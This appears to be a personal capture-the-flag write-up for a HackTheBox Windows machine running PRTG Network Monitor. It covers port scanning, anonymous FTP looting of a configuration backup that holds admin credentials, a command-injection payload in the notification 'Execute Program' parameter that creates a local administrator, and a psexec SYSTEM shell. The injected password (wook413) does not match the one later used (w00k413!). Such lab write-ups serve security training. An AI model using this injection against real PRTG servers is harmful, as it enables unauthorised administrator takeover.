#windows #hackthebox #easy ![[Pasted image 20250615134211.png]] --- # Port Scanning - Nmap Scanned all TCP ports to get an overview understanding of what ports are open. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS 10.10.10.152 -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:49 CDT Nmap scan report for 10.10.10.152 Host is up (0.050s latency). Not shown: 64184 closed tcp ports (reset), 1338 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds ``` Then performed another scan on those open ports but with `-sC` and `-sV` options. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV 10.10.10.152 -p 21,80,135,139,445,5985,47001,49664-49669 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:52 CDT Nmap scan report for 10.10.10.152 Host is up (0.050s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM <DIR> inetpub | 07-16-16 09:18AM <DIR> PerfLogs | 02-25-19 10:56PM <DIR> Program Files | 02-03-19 12:28AM <DIR> Program Files (x86) | 02-03-19 08:08AM <DIR> Users |_11-10-23 10:20AM <DIR> Windows 80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-trane-info: Problem with XML parsing of /evox/about |_http-server-header: PRTG/18.1.37.13946 | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-06-15T18:53:49 |_ start_date: 2025-06-15T18:41:43 | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.91 seconds ``` No open UDP ports. Well, at least no open ports among top 1,000 ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU 10.10.10.152 --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:57 CDT Nmap scan report for 10.10.10.152 Host is up (0.058s latency). Not shown: 999 open|filtered udp ports (no-response) PORT STATE SERVICE 36384/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds ``` # Footprinting ### FTP 21 As we can see from the nmap output, FTP allows anonymous login. Let's take a look at the FTP server first. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ ftp $IP Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:parallels): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||50035|) 150 Opening ASCII mode data connection. 02-03-19 12:18AM 1024 .rnd 02-25-19 10:15PM <DIR> inetpub 07-16-16 09:18AM <DIR> PerfLogs 02-25-19 10:56PM <DIR> Program Files 02-03-19 12:28AM <DIR> Program Files (x86) 02-03-19 08:08AM <DIR> Users 11-10-23 10:20AM <DIR> Windows 226 Transfer complete. ``` In the path `/Users/Public/Desktop`, there is `user.txt` and two `.lnk` files which I downloaded and the `user.txt` file turned out to be the actual user flag. ```bash ftp> pwd Remote directory: /Users/Public/Desktop ftp> ls 229 Entering Extended Passive Mode (|||50059|) 150 Opening ASCII mode data connection. 02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk 02-03-19 12:18AM 1160 PRTG Network Monitor.lnk 06-15-25 02:42PM 34 user.txt 226 Transfer complete. ``` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ cat user.txt da47... ``` ### HTTP 80 - I was prompted to enter creds but I haven't found any creds yet. Skipping this for now. - I've tried default credentials `prtgadmin:prtgadmin` found in https://www.exploit-db.com/exploits/46527 but didn't work. ### SMB 445 tried null session with `smbclient` but didn't work. `smbmap` and `enum4linux` didn't reveal anything of interest either. ### HTTP 5985 & 47001 Not found.. ### FTP 21 - Again At this point, I couldn't enumerate any ports except port 21, so I logged in back to FTP server with anonymous login. This time I tried `ls -la` command to reveal everything including hidden directories and traverse to `ProgramData` folder in which I found `Paessler` and `PRTG Network Monitor` directory. I downloaded all 4 of files that start with `PRTG Configuration.` with `mget PRTG Configuration*` ```bash 229 Entering Extended Passive Mode (|||50718|) 150 Opening ASCII mode data connection. 06-15-25 03:23PM <DIR> Configuration Auto-Backups 06-15-25 02:42PM <DIR> Log Database 02-03-19 12:18AM <DIR> Logs (Debug) 02-03-19 12:18AM <DIR> Logs (Sensors) 02-03-19 12:18AM <DIR> Logs (System) 06-15-25 02:42PM <DIR> Logs (Web Server) 06-15-25 02:47PM <DIR> Monitoring Database 02-25-19 10:54PM 1189697 PRTG Configuration.dat 02-25-19 10:54PM 1189697 PRTG Configuration.old 07-14-18 03:13AM 1153755 PRTG Configuration.old.bak 06-15-25 03:23PM 1680954 PRTG Graph Data Cache.dat 02-25-19 11:00PM <DIR> Report PDFs 02-03-19 12:18AM <DIR> System Information Database 02-03-19 12:40AM <DIR> Ticket Database 02-03-19 12:18AM <DIR> ToDo Database ``` I looked through all 4 of the downloaded files and finally I found a set of credentials inside `PRTG Configuration.old.bak` file. Found credentials: `prtgadmin:PrTg@dmin2018` ![[Pasted image 20250615145017.png]] Unfortunately, the password I found was still not valid. ![[Pasted image 20250615150430.png]] Then I thought to try the password `PrTg@dmin2019` not "2018" and it worked. Come to think of it, everything makes sense because the creds I found was in a file named `PRTG Configuration.old.bak` which indicates it's an "old" backup file. After successfully logging in, I was lost for a long time. Then I decided to refer to `0xdf`'s writeup. So the following exploit is not original but reference from `0xdf` and others. Navigate to `Setup` -> `Notifications` under Account Settings and click the `+` sign to 'add new notification'. Scroll to bottom and check `Execute Program`. The Parameter field is what's vulnerable and leading to exploit. We are going to inject the following to the field: `test.txt;net user wook wook413 /add;net localgroup administrators wook /add` Let me breakdown the command: - `test.txt` is just a random harmless value - `;`: command separator which will allow the execution of following commands - `net user wook wook413 /add`: adds a new user named `wook` with the password `wook413` to the system. - `net localgroup administrators wook /add`: adds the newly created **wook** user to the **Administrators** group, giving it local admin privilege. ![[Pasted image 20250615151838.png]] ![[Pasted image 20250615155219.png]] Upon hitting save, you are back in this screen. Click the far right icon of your newly created notification and select the bell shaped icon at the very top. ![[Pasted image 20250615154440.png]] It says a test notification was triggered and queued for delivery. ![[Pasted image 20250615154614.png]] After waiting a few seconds, I tried `smbclient` and `smbmap` to see if listing servers would work with the newly created account `wook:w00k413!` and they did! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ smbclient -L //$IP/ -U 'wook%w00k413!' Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` smbmap ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ smbmap -H $IP -u wook -p 'w00k413!' ________ ___ ___ _______ ___ ___ __ _______ /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\ (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/ __/ \ |: \. |(| _ \ |: \. | // __' \ (| / /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \ (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______) ----------------------------------------------------------------------------- SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - [email protected] https://github.com/ShawnDEvans/smbmap [\] Checking for open ports... [|] Checking for open ports... [*] Detected 1 hosts serving SMB [/] Authenticating... [-] Authenticating... [\] Authenticating... [|] Authenticating... [/] Authenticating... [*] Established 1 SMB connections(s) and 1 authenticated session(s) [-] Enumerating shares... [+] IP: 10.10.10.152:445 Name: 10.10.10.152 Status: ADMIN!!! Disk Permissions Comment ---- ----------- ------- ADMIN$ READ, WRITE Remote Admin C$ READ, WRITE Default share IPC$ READ ONLY Remote IPC ``` From here, we have many different options to get a shell as administrator but here, we are going to use `psexec.py` ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ psexec.py 'wook:w00k413!'@$IP Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on 10.10.10.152..... [*] Found writable share ADMIN$ [*] Uploading file uSbNnSbL.exe [*] Opening SVCManager on 10.10.10.152..... [*] Creating service IPZa on 10.10.10.152..... [*] Starting service IPZa..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32> whoami nt authority\system ``` found `root.txt`! ```powershell C:\Users\Administrator\Desktop> dir Volume in drive C has no label. Volume Serial Number is 0EF5-E5E5 Directory of C:\Users\Administrator\Desktop 02/03/2019 12:35 AM <DIR> . 02/03/2019 12:35 AM <DIR> .. 06/15/2025 02:42 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 6,735,409,152 bytes free C:\Users\Administrator\Desktop> type root.txt a46b... ```